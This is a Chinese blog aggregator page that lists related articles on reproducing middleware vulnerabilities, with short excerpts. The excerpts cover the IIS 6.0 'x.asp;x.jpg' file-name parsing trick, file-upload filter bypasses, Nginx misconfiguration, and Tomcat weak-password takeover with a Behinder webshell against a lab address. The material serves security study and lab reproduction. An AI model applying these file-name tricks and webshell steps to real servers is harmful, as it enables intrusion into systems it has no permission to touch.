    中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等。 中間件所披露的問(wèn)題: 中間件安全-IISApacheTomcatNginx漏洞復(fù)現(xiàn) 中間件安全-WeblogicJenkinsGlassFish漏洞復(fù)現(xiàn) 1、中間

    2024年02月08日
    瀏覽(26)
  • 33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    IIS爆過(guò)漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后綴名,但是會(huì)被解析為asp文件; 目錄名:x.asp/x.jpg, 文件目錄名含有.asp后綴,x.jpg也會(huì)被解析為asp文件。 觸發(fā)條件: IIS6.0這個(gè)中間件; 上傳文件能不

    2024年01月24日
    瀏覽(31)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識(shí)點(diǎn): 1 、中間件安全問(wèn)題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細(xì)點(diǎn): 1 、檢測(cè)層面:前端,后端等 2 、檢測(cè)內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測(cè)后綴:黑名單,白名單, MIME 檢測(cè)等 4 、繞過(guò)技

    2024年03月16日
    瀏覽(32)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    先自我介紹一下,小編浙江大學(xué)畢業(yè),去過(guò)華為、字節(jié)跳動(dòng)等大廠,目前阿里P7 深知大多數(shù)程序員,想要提升技能,往往是自己摸索成長(zhǎng),但自己不成體系的自學(xué)效果低效又漫長(zhǎng),而且極易碰到天花板技術(shù)停滯不前! 因此收集整理了一份《2024年最新網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》

    2024年04月24日
    瀏覽(49)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    2、解析漏洞-nginx.conf 配置不當(dāng) 二,Web 應(yīng)用編輯器-Ueditor 文件上傳安全 三,實(shí)例 CMS平臺(tái)-中間件解析編輯器引用 配套資源下載(百度網(wǎng)盤): 鏈接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4? 提取碼:jgg4 本章節(jié)知識(shí)點(diǎn): 1 、中間件安全問(wèn)題 2 、中間件文件上傳解析 3 、

    2024年04月15日
    瀏覽(28)
  • tomcat中間件漏洞復(fù)現(xiàn)

    tomcat中間件漏洞復(fù)現(xiàn)

    Tomcat是Apache 軟件基金會(huì)(Apache Software Foundation)的Jakarta 項(xiàng)目中的一個(gè)核心項(xiàng)目,由Apache、Sun 和其他一些公司及個(gè)人共同開(kāi)發(fā)而成。由于有了Sun 的參與和支持,最新的Servlet 和JSP 規(guī)范總是能在Tomcat 中得到體現(xiàn),Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 規(guī)范。因?yàn)門omcat 技術(shù)先進(jìn)、性

    2024年02月10日
    瀏覽(23)
  • 【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    目錄 1、tomcat后臺(tái)弱口令漏洞利用 利用冰蝎連接: 2、tomcat遠(yuǎn)程代碼執(zhí)行漏洞 利用冰蝎子連接: 利用冰蝎連接: 靶場(chǎng): 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子連接:

    2024年01月21日
    瀏覽(24)
  • express中間件當(dāng)做前端服務(wù)器的安全漏洞處理

    使用express當(dāng)做node服務(wù)器時(shí),發(fā)現(xiàn)安全漏洞,記錄處理步驟: PS:以下安全內(nèi)容處理,需要使用到redis進(jìn)行會(huì)話存儲(chǔ)、請(qǐng)求計(jì)數(shù)、請(qǐng)求唯一限制等。為盡量確保開(kāi)發(fā)環(huán)境與部署環(huán)境一致,請(qǐng)開(kāi)發(fā)環(huán)境安裝并啟動(dòng)Redis服務(wù)。 ** 此文檔只是說(shuō)明記錄關(guān)鍵步驟。具體實(shí)現(xiàn)代碼可參照附

    2024年03月27日
    瀏覽(28)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包